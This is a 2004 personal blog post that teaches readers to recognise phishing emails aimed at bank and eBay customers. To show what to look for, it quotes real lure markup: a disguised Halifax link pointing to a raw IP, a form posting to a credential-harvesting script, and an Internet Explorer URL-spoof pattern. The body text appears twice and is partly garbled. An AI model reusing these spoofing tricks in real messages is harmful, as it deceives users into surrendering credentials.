Wednesday, March 31, 2004
Phishing for phoneys
Phishers target the unwary. There's nothing too sophisticated in their
scams - they simply pretend to be your bank or building society or similar
institution, and ask for your details. A typical scam is to send you an
email with a forged From: address (and many web-based email clients allow
you to type your own From address into them, so it's not hard to do) so that
it looks like it comes from the bank. The message often says something like
"There is a current fraud happening - and to stop it please go to this
address (some URL given) and enter all your details". By noting that there
is a scam around it tries to fool you into trusting it. The cleverer ones
make it appear that the URL you are going to is real by using a flaw (for
which a patch is available) in Internet Explorer - a url of the form
http://www.bestbankintheworld.com in unpatched browsers, but will actually
take you to the fakersRus.com site. This fake site copies the graphics and
layout of the true site, but your details are captured and stored before you
are forwarded to the genuine one.
(interesting aside - *AT* should be @, but if I put that in the page then my virus scanner picks up that a URL spoof is occuring and gives me a warning message about the HTML file! So there's another lesson - keep your virus scanner up to date as well because it protects you more than you (or I!) know)
How to spot this? Basic awareness, really: no genuine bank or other
organisation will ever, ever ask you for key information by sending you an
email and telling you to go to a site. Moreover, they'll never ask you for
account names, numbers, passwords, pin numbers and key words all to be
confirmed on one page. And in general, the phishing emails are badly spelt
and quite obvious to spot. If you look at the source of the
message, you can often tell it to b a fraud: one doing the rounds at the moment has a link of the form
<a href="http://218.44.251.101/h/formslogin.html">
https://www.halifax-online.co.uk/_mem_bin/formslogin.asp</a>
so whilst the link appears okay, the page actually goes to 218.44... etc. - this even comes up in the address bar!! I
keep getting emails from organisations I'm not even a member of!!
Note that it's not enough to assume that because you are on a secure site
(https url, and padlock in the bottom right of the IE browser) you are safe,
since anyone can set up a secure server. But you should never enter
security information into a non-secure site.
How else to protect yourself? Patch your system and keep it up to date. If
users kept their systems current then many of the technical tricks that are
played would not work. But I know it's a pain to do it. Simple awareness
is required - be as suspicious of anything in your inbox as you would of a
stranger who knocks on your door. If you're in doubt, ignore it - if urgent
the bank will write you a letter - or phone the bank to check.
There's another one just landed in my inbox, slightly cleverer than many - it's an HTML email so it
shows automatically in my preview pane, and all the obvious links in it
refer to the actual e-bay site - clicking on them takes you to the official
site. It also has a forged email address header. But since ebay never send
out such emails, it must be a fake. Inspecting the code (right-click in IE)
shows that the submit button at the bottom takes you to
<FORM name=Simple action=http://209.197.232.11/~narghile/d.php method=post>
i.e. some person's page that will record your details and then forward you
almost immediately to the ebay official site, to the signin page (it's not
clever enough to actually sign you in). I know cos I tried it (with a fake
id).
And why? cos sellers with good ratings are valuable commodities on ebay -
they are trusted - so capturing one or two of them allows somebody to shift
a lot of stuff.....
Phishers target the unwary. There's nothing too sophisticated in their
scams - they simply pretend to be your bank or building society or similar
institution, and ask for your details. A typical scam is to send you an
email with a forged From: address (and many web-based email clients allow
you to type your own From address into them, so it's not hard to do) so that
it looks like it comes from the bank. The message often says something like
"There is a current fraud happening - and to stop it please go to this
address (some URL given) and enter all your details". By noting that there
is a scam around it tries to fool you into trusting it. The cleverer ones
make it appear that the URL you are going to is real by using a flaw (for
which a patch is available) in Internet Explorer - a url of the form
will display as
http://www.bestbankintheworld.com%01*AT*fakersRus.com
http://www.bestbankintheworld.com in unpatched browsers, but will actually
take you to the fakersRus.com site. This fake site copies the graphics and
layout of the true site, but your details are captured and stored before you
are forwarded to the genuine one.
(interesting aside - *AT* should be @, but if I put that in the page then my virus scanner picks up that a URL spoof is occuring and gives me a warning message about the HTML file! So there's another lesson - keep your virus scanner up to date as well because it protects you more than you (or I!) know)
How to spot this? Basic awareness, really: no genuine bank or other
organisation will ever, ever ask you for key information by sending you an
email and telling you to go to a site. Moreover, they'll never ask you for
account names, numbers, passwords, pin numbers and key words all to be
confirmed on one page. And in general, the phishing emails are badly spelt
and quite obvious to spot. If you look at the source of the
message, you can often tell it to b a fraud: one doing the rounds at the moment has a link of the form
<a href="http://218.44.251.101/h/formslogin.html">
https://www.halifax-online.co.uk/_mem_bin/formslogin.asp</a>
so whilst the link appears okay, the page actually goes to 218.44... etc. - this even comes up in the address bar!! I
keep getting emails from organisations I'm not even a member of!!
Note that it's not enough to assume that because you are on a secure site
(https url, and padlock in the bottom right of the IE browser) you are safe,
since anyone can set up a secure server. But you should never enter
security information into a non-secure site.
How else to protect yourself? Patch your system and keep it up to date. If
users kept their systems current then many of the technical tricks that are
played would not work. But I know it's a pain to do it. Simple awareness
is required - be as suspicious of anything in your inbox as you would of a
stranger who knocks on your door. If you're in doubt, ignore it - if urgent
the bank will write you a letter - or phone the bank to check.
There's another one just landed in my inbox, slightly cleverer than many - it's an HTML email so it
shows automatically in my preview pane, and all the obvious links in it
refer to the actual e-bay site - clicking on them takes you to the official
site. It also has a forged email address header. But since ebay never send
out such emails, it must be a fake. Inspecting the code (right-click in IE)
shows that the submit button at the bottom takes you to
<FORM name=Simple action=http://209.197.232.11/~narghile/d.php method=post>
i.e. some person's page that will record your details and then forward you
almost immediately to the ebay official site, to the signin page (it's not
clever enough to actually sign you in). I know cos I tried it (with a fake
id).
And why? cos sellers with good ratings are valuable commodities on ebay -
they are trusted - so capturing one or two of them allows somebody to shift
a lot of stuff.....
(c) 2003-2005 Russell Beale
Atom
RSS